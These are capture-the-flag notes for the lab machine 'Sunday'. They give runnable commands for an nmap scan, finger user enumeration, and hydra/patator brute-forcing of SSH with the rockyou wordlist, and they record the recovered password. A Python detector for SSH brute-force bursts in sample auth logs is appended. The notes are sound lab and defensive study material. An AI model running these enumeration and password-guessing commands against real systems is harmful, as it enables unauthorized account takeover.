Enum Finger and Brute SSH
Enumerate Finger Users
REF: htb:sunday
Scan:
> sudo nmap -sV -O -A 10.129.87.199
Found:
79/tcp open finger Sun Solaris fingerd
Finger:
> finger @10.129.87.203 ..no one logged on
> finger root@10.129.87.203 ..root logged on
Finger-Script:
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
> ./finger-user-enum.pl -U /opt/useful/SecLists/Usernames/Names/names.txt -t 10.129.87.203
sammy@10.129.87.203: sammy console <Sep 30 13:21>
sunny@10.129.87.203: sunny pts/3 <Apr 24, 2018> 10.10.14.4
Brute SSH
> hydra -V -I -l sunny -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.87.203 ssh -s 22022
> patator ssh_login host=10.129.87.203 port=22022 user=sunny password=FILE0 0=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt persistent=0
> ssh sunny@10.129.87.203 -p 22022
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.129.87.203 -p 22022
pw: sunday
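Detection side of the password guessing above, as an added example that is not part of the original notes: it flags a source that produces a burst of failed SSH logins against one account and marks the alert when a successful login follows. The OpenSSH-style log format, the sample lines, the threshold and window values, and the name detect_bruteforce are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed OpenSSH-style auth log lines (sample data, not from the original page).
SAMPLE_LOG = """\
2018-04-24T10:00:01 sshd[811]: Failed password for sunny from 10.10.14.4 port 40122 ssh2
2018-04-24T10:00:02 sshd[812]: Failed password for sunny from 10.10.14.4 port 40124 ssh2
2018-04-24T10:00:03 sshd[813]: Failed password for sunny from 10.10.14.4 port 40126 ssh2
2018-04-24T10:00:04 sshd[814]: Failed password for sunny from 10.10.14.4 port 40128 ssh2
2018-04-24T10:00:05 sshd[815]: Failed password for sunny from 10.10.14.4 port 40130 ssh2
2018-04-24T10:00:06 sshd[816]: Accepted password for sunny from 10.10.14.4 port 40132 ssh2
2018-04-24T10:07:00 sshd[901]: Failed password for sammy from 10.10.14.9 port 51000 ssh2
2018-04-24T10:30:00 sshd[950]: Accepted password for sammy from 10.10.14.9 port 51040 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Alert on (ip, user) pairs with >= threshold failures inside window."""
    failures = defaultdict(list)   # (ip, user) -> failure timestamps still in window
    alerts = {}                    # (ip, user) -> alert dict
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        ts = datetime.fromisoformat(m["ts"])
        if m["result"] == "Failed":
            recent = [t for t in failures[key] if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {"ip": key[0], "user": key[1],
                               "failures": len(recent), "compromised": False}
            elif key in alerts:
                alerts[key]["failures"] += 1
        elif key in alerts:
            alerts[key]["compromised"] = True  # login succeeded after a failure burst
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

An alert with compromised set to True is the case to triage first: the account's password should be treated as known to the source address.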